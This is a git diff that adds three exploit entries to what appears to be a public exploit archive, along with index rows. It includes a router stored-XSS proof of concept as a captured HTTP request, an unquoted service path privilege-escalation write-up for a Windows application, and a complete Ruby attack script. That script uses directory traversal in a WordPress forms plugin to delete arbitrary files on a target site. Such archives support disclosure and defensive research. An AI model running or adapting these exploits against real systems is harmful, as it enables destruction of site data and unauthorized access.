diff --git a/exploits/hardware/webapps/47491.txt b/exploits/hardware/webapps/47491.txt
new file mode 100644
index 000000000..96ddca3f7
--- /dev/null
+++ b/exploits/hardware/webapps/47491.txt
@@ -0,0 +1,39 @@
+# Exploit Title: Intelbras Router WRN150 1.0.18 - Persistent Cross-Site Scripting
+# Date: 2019-10-03
+# Exploit Author: Prof. Joas Antonio
+# Vendor Homepage: https://www.intelbras.com/pt-br/
+# Software Link: http://en.intelbras.com.br/node/25896
+# Version: 1.0.18
+# Tested on: Windows
+# CVE : CVE-2019–17411
+
+# PoC 1:
+
+1) Login to your router
+
+2) After signing in as WAN Settings
+
+3) Select for PPPOE mode
+
+4) In the Service Name and Server Name field, enter any of these payloads:
+
+
+
+
+
+# PoC burp.txt
+
+POST /goform/AdvSetWan HTTP/1.1
+Host: TARGET
+Content-Length: 281
+Cache-Control: max-age=0
+Origin: http://TARGET
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
+Referer: http://TARGET/wan_connected.asp
+Accept-Encoding: gzip, deflate
+Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: ecos_pw=bWFkYXJhMTIxMQ==2dw:language=pt
+Connection: close
\ No newline at end of file
diff --git a/exploits/php/webapps/47492.rb b/exploits/php/webapps/47492.rb
new file mode 100755
index 000000000..7d08c7618
--- /dev/null
+++ b/exploits/php/webapps/47492.rb
@@ -0,0 +1,236 @@
+# Exploit Title: WordPress Arforms 3.7.1 - Directory Traversal
+# Date: 2019-09-27
+# Exploit Author: Ahmad Almorabea
+# Updated version of the exploit can be found always at : http://almorabea.net/cve-2019-16902.txt
+# Software Link: https://www.arformsplugin.com/documentation/changelog/
+# Version: 3.7.1
+# CVE ID: CVE-2019-16902
+
+#**************Start Notes**************
+# You can run the script by putting the script name and then the URL and the URL should have directory the Wordpress folders.
+# Example : exploit.rb www.test.com, and the site should have the Wordpress folders in it such www.test.com/wp-contnet.
+# Pay attention to the 3 numbers at the beginning maybe you need to change it in other types like in this script is 143.
+# But maybe in other forms maybe it's different so you have to change it accordingly.
+# This version of the software is applicable to path traversal attack so you can delete files if you knew the path such ../../ and so on
+# There is a request file with this Script make sure to put it in the same folder.
+#**************End Notes****************
+
+#!/usr/bin/env ruby
+
+require "net/http"
+require 'colorize'
+
+$host = ARGV[0] || ""
+$session_id = ARGV[1] || "3c0e9a7edfa6682cb891f1c3df8a33ad"
+
+
+def start_function ()
+
+ puts "It's a weird question to ask but let's start friendly I'm Arforms exploit, what's your name?".yellow
+ name = STDIN.gets
+
+ if $host == ""
+ puts "What are you doing #{name} where is the URL so we can launch the attack, please pay more attention buddy".red
+ exit
+ end
+
+
+ check_existence_arform_folder
+ execute_deletion_attack
+
+ puts "Done ... see ya " + name
+
+end
+
+
+def send_checks(files_names)
+
+
+
+
+ j = 1
+ while j <= files_names.length-1
+
+ uri = URI.parse("http://#{$host}/wp-content/uploads/arforms/userfiles/"+files_names[j])
+ http = Net::HTTP.new(uri.host, uri.port)
+ http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS
+
+ request = Net::HTTP::Get.new(uri.request_uri)
+ request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"
+ request["Connection"] = "keep-alive"
+ request["Accept-Language"] = "en-US,en;q=0.5"
+ request["Accept-Encoding"] = "gzip, deflate"
+ request["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
+
+
+ begin
+
+ response = http.request(request).code
+ puts "The File " + files_names[j] + " has the response code of " + response
+ rescue Exception => e
+ puts "[!] Failed!"
+ puts e
+ end
+ j = j+1
+ end
+end
+
+
+def check_existence_arform_folder ()
+
+
+
+ path_array = ["/wp-plugins/arforms","/wp-content/uploads/arforms/userfiles"]
+ $i = 0
+ results = []
+
+ while $i <= path_array.length-1
+
+ uri = URI.parse("http://#{$host}/#{path_array[$i]}")
+ #puts uri
+ http = Net::HTTP.new(uri.host, uri.port)
+ http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS
+ request = Net::HTTP::Get.new(uri.request_uri)
+ response = http.request(request)
+ results[$i] = response.code
+ #puts"response code is : " + response.code
+
+ $i +=1
+
+ end
+
+ puts "****************************************************"
+
+ if results[0] == "200" || results[0] =="301"
+
+ puts "The Plugin is Available on the following path : ".green + $host + path_array[0]
+ else
+ puts "We couldn't locate the Plugin in this path, you either change the path or we can't perform the attack, Simple Huh?".red
+ exit
+ end
+
+ if (results[1] == "200" || results[1] == "301")
+
+ puts "The User Files folder is Available on the following path : ".green + $host + path_array[1]
+ else
+
+ puts "We couldn't find the User Files folder, on the following path ".red + $host + path_array[1]
+
+ end
+ puts "****************************************************"
+
+
+
+end
+
+
+def execute_deletion_attack ()
+
+
+
+ puts "How many file you want to delete my man"
+ amount = STDIN.gets.chomp.to_i
+
+ if(amount == 0)
+ puts "You can't use 0 or other strings this input for the amount of file you want to delete so it's an Integer".blue
+ exit
+ end
+
+ file_names = []
+ file_names[0] = "143_772_1569713145702_temp3.txt"
+ j = 1
+ while j <= amount.to_i
+ puts "Name of the file number " + j.to_s
+ file_names[j] = STDIN.gets
+ file_names[j].strip!
+ j = j+1
+ end
+
+
+ uri = URI.parse("http://#{$host}")
+ #puts uri
+ http = Net::HTTP.new(uri.host, uri.port)
+ http.use_ssl = true if uri.scheme == 'https'
+ request = Net::HTTP::Get.new(uri.request_uri)
+ response = http.request(request)
+ global_cookie = response.response['set-cookie'] + "; PHPSESSID="+$session_id #Assign the session cookie
+
+
+
+
+ $i = 0
+ while $i <= file_names.length-1
+
+ puts "Starting the Attack Journey .. ".green
+
+ uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php")
+ headers =
+ {
+ 'Referer' => 'From The Sky',
+ 'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
+ 'Content-Type' => 'multipart/form-data; boundary=---------------------------14195989911851978808724573615',
+ 'Accept-Encoding' => 'gzip, deflate',
+ 'Cookie' => global_cookie,
+ 'X_FILENAME' => file_names[$i],
+ 'X-FILENAME' => file_names[$i],
+ 'Connection' => 'close'
+
+ }
+
+ http = Net::HTTP.new(uri.host, uri.port)
+ http.use_ssl = true if uri.scheme == 'https'
+ request = Net::HTTP::Post.new(uri.path, headers)
+ request.body = File.read("post_file")
+ response = http.request request
+
+ $i = $i +1
+ end
+
+ execute_delete_request file_names,global_cookie,amount.to_i
+
+ puts "Finished.........."
+
+end
+
+def execute_delete_request (file_names,cookies,rounds )
+
+
+ $i = 0
+
+ while $i <= file_names.length-1
+
+ puts "Starting the Attack on file No #{$i.to_s} ".green
+
+ uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php")
+ headers =
+ {
+ 'Referer' => 'From The Sky',
+ 'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
+ 'Accept' => '*/*',
+ 'Accept-Language' => 'en-US,en;q=0.5',
+ 'X-Requested-With'=> 'XMLHttpRequest',
+ 'Cookie' => cookies,
+ 'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8',
+ 'Accept-Encoding' => 'gzip, deflate',
+ 'Connection' => 'close'
+ }
+
+ http = Net::HTTP.new(uri.host, uri.port)
+ http.use_ssl = true if uri.scheme == 'https'
+ request = Net::HTTP::Post.new(uri.path,headers)
+ request.body = "action=arf_delete_file&file_name="+file_names[$i]+"&form_id=143"
+ response = http.request(request)
+
+ if $i != 0
+ puts "File Name requested to delete is : " + file_names[$i] + " has the Response Code of " + response.code
+ end
+ $i = $i +1
+
+ end
+
+ send_checks file_names
+
+end
+
+
+start_function()
\ No newline at end of file
diff --git a/exploits/windows/local/47490.txt b/exploits/windows/local/47490.txt
new file mode 100644
index 000000000..e13cf4742
--- /dev/null
+++ b/exploits/windows/local/47490.txt
@@ -0,0 +1,58 @@
+# Exploit Title: National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation
+# Discovery Date: 2019-10-10
+# Exploit Author: Ivan Marmolejo
+# Vendor Homepage: http://www.ni.com/en-us.html
+# Software Link: https://www.ni.com/en-us/shop/select/circuit-design-suite
+# Version: 14.0
+# Vulnerability Type: Local
+# Tested on: Windows 10 Pro x64 Esp
+# Version: 10.0.18362
+
+# Exploit.txt
+
+##############################################################################################################################################
+
+Summary: Circuit Design Suite combines Multisim and Ultiboard software to offer a complete set of tools for circuit design,simulation,
+validation and design. Circuit Design Suite helps you design circuits with intuitive and cost-effective tools. You can perform an interactive
+SPICE simulation and make a perfect transition to PCB design and routing software. Built for education, research and design, the suite offers
+advanced simulation capabilities to give you a clear view of how circuits perform in any situation.
+
+Description: The application suffers from an unquoted search path issue impacting the service 'NiSvcLoc'. This could potentially allow an
+authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require
+the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could
+potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges
+of the application.
+
+
+##############################################################################################################################################
+
+Step to discover the unquoted Service:
+
+
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+
+NI Service Locator NiSvcLoc C:\Program Files (x86)\National Instruments\Shared\niSvcLoc\nisvcloc.exe -s Auto
+
+
+##############################################################################################################################################
+
+Service info:
+
+
+C:\Users\user>sc qc NiSvcLoc
+
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: NiSvcLoc
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\National Instruments\Shared\niSvcLoc\nisvcloc.exe -s
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : NI Service Locator
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+##############################################################################################################################################
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index bec263193..6303adc8b 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10712,6 +10712,7 @@ id,file,description,date,author,type,platform,port
47471,exploits/windows/local/47471.txt,"CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation",2019-10-07,"Jakub Palaczynski",local,windows,
47477,exploits/windows/local/47477.py,"DeviceViewer 3.12.0.1 - 'add user' Local Buffer Overflow (DEP Bypass)",2019-10-09,"Alessandro Magnosi",local,windows,
47482,exploits/linux/local/47482.rb,"ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (Metasploit_ DEP Bypass)",2019-10-10,max7253,local,linux,
+47490,exploits/windows/local/47490.txt,"National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation",2019-10-11,"Ivan Marmolejo",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41819,3 +41820,5 @@ id,file,description,date,author,type,platform,port
47475,exploits/php/webapps/47475.php,"vBulletin 5.0 < 5.5.4 - 'updateAvatar' Authenticated Remote Code Execution",2019-10-07,EgiX,webapps,php,
47480,exploits/hardware/webapps/47480.txt,"SMA Solar Technology AG Sunny WebBox device - 1.6 - Cross-Site Request Forgery",2019-10-10,"Borja Merino",webapps,hardware,80
47483,exploits/hardware/webapps/47483.py,"TP-Link TL-WR1043ND 2 - Authentication Bypass",2019-10-10,"Uriel Kosayev",webapps,hardware,80
+47491,exploits/hardware/webapps/47491.txt,"Intelbras Router WRN150 1.0.18 - Persistent Cross-Site Scripting",2019-10-11,"Prof. Joas Antonio",webapps,hardware,
+47492,exploits/php/webapps/47492.rb,"WordPress Arforms 3.7.1 - Directory Traversal",2019-10-11,"Ahmad Almorabea",webapps,php,